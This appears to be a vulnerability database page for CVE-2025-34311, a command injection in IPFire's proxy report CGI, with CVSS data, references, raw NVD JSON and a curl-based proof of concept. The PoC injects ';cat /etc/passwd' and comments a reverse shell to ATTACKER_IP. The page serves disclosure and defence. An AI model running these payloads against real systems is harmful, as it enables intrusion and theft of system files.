CVE-2025-34311

Description

IPFire versions prior to 2.29 (Core Update 198) contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP POST to /cgi-bin/logs.cgi/calamaris.dat and reads the values of DAY_BEGIN, MONTH_BEGIN, YEAR_BEGIN, DAY_END, MONTH_END, YEAR_END, NUM_DOMAINS, PERF_INTERVAL, NUM_CONTENT, HIST_LEVEL, NUM_HOSTS, NUM_URLS, and BYTE_UNIT, which are interpolated directly into the shell invocation of the mkreport helper. Because these parameters are never sanitized for improper characters or constructs, a crafted POST can inject shell metacharacters into one or more fields, causing arbitrary commands to run with the privileges of the 'nobody' user.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:* - VULNERABLE

IPFire < 2.29 (Core Update 198)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-34311 IPFire Command Injection PoC
# Authenticated command injection via Proxy Report Creation

TARGET="https://target-ipfire.local:444"
USERNAME="admin"
PASSWORD="password"
COOKIE_JAR="/tmp/ipfire_cookies.txt"

# Step 1: Authenticate and obtain session cookie
curl -k -c "$COOKIE_JAR" -d "username=$USERNAME&password=$PASSWORD" \
  "$TARGET/cgi-bin/login.cgi" -L -o /dev/null

echo "[*] Sending malicious request with command injection payload..."

# Step 2: Send crafted POST request with command injection
# Injecting: ;cat /etc/passwd > /tmp/pwned.txt
curl -k -b "$COOKIE_JAR" -X POST \
  "$TARGET/cgi-bin/logs.cgi/calamaris.dat" \
  -d "DAY_BEGIN=1" \
  -d "MONTH_BEGIN=01" \
  -d "YEAR_BEGIN=2024" \
  -d "DAY_END=31" \
  -d "MONTH_END=12" \
  -d "YEAR_END=2024" \
  -d "NUM_DOMAINS=10" \
  -d "PERF_INTERVAL=daily" \
  -d "NUM_CONTENT=50" \
  -d "HIST_LEVEL=1" \
  -d "NUM_HOSTS=20" \
  -d "NUM_URLS=100" \
  -d "BYTE_UNIT=M" \
  -d "LANG=en" \
  -d ";cat /etc/passwd > /tmp/pwned.txt;" \
  -L -o /dev/null -s

echo "[+] Request sent. Check /tmp/pwned.txt on target for /etc/passwd contents"

# Alternative reverse shell payload:
# ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34311
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34311
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34311/
[4] VulDB https://vuldb.com/cve/CVE-2025-34311
[5] https://bugzilla.ipfire.org/show_bug.cgi?id=13886
[6] https://www.ipfire.org/blog/ipfire-2-29-core-update-198-released
[7] https://www.vulncheck.com/advisories/ipfire-command-injection-via-proxy-report-creation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34311", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:11.400", "lastModified": "2025-11-03T17:02:11.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IPFire versions prior to 2.29 (Core Update 198) contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP POST to /cgi-bin/logs.cgi/calamaris.dat and reads the values of DAY_BEGIN, MONTH_BEGIN, YEAR_BEGIN, DAY_END, MONTH_END, YEAR_END, NUM_DOMAINS, PERF_INTERVAL, NUM_CONTENT, HIST_LEVEL, NUM_HOSTS, NUM_URLS, and BYTE_UNIT, which are interpolated directly into the shell invocation of the mkreport helper. Because these parameters are never sanitized for improper characters or constructs, a crafted POST can inject shell metacharacters into one or more fields, causing arbitrary commands to run with the privileges of the 'nobody' user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.29", "matchCriteriaId": "9A0A85D3-A192-4FD9-9510-99D85BCF334A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:*", "matchCriteriaId": "A39350F9-D6D9-49A5-88BC-C5489AA6038C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:*", "matchCriteriaId": "CDDC0CEB-073B-41A0-8A52-4DAAAD77AA6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:*", "matchCriteriaId": "745640B9-2180-48C3-82CC-D6E73AAF95D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:*", "matchCriteriaId": "08006D41-7288-4333-83FE-B6FD7CD5C779"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update187:*:*:*:*:*:*", "matchCriteriaId": "15EE4FEE-62AB-4172-B898-19DE6F50B7AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update188:*:*:*:*:*:*", "matchCriteriaId": "5B0ECE9B-DD45-40E1-842A-0B0B1786187E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update189:*:*:*:*:*:*", "matchCriteriaId": "9B9BDB00-A750-4053-8812-5A3854042CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update190:*:*:*:*:*:*", "matchCriteriaId": "16F654D7-CC82-4428-BBEF-1110CAE75597"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update191:*:*:*:*:*:*", "matchCriteriaId": "FFCC61A9-AF1B-4F8A-98D2-FB7854AF0EF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update192:*:*:*:*:*:*", "matchCriteriaId": "7A66DC97-E88F-455E-B688-88BC ... (truncated)